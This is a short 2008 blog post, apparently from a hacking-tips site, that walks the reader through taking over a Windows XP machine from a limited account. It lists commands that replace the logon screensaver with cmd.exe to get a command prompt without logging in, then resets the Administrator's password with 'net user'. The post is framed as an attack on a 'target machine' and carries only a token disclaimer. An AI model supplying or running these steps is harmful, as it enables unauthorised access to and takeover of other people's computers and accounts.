Friday, February 29, 2008

Disabling Administrator's Password

Please do not misuse this information, we are not responsible for the damage you do.

If you log into a limited account on your target machine and open up a dos prompt then enter this set of commands Exactly:

cd\
cd\windows\system32
mkdir temphack
copy logon.scr temphack\logon.scr
copy cmd.exe temphack\cmd.exe
del logon.scr
rename cmd.exe logon.scr
exit

Now what you have just done is told the computer to back up the command program and the screen saver file, then edits the settings so when the machine boots the screen saver you will get an unprotected dos prompt with out logging into XP.

Once this happens if you enter this command without the inverted commas,

"net user password"

If the Administrator Account is called Linkin and you want the password park

then enter this

"net user Linkin park"

and this changes the password on Linkin's machine to park and your in.

No comments: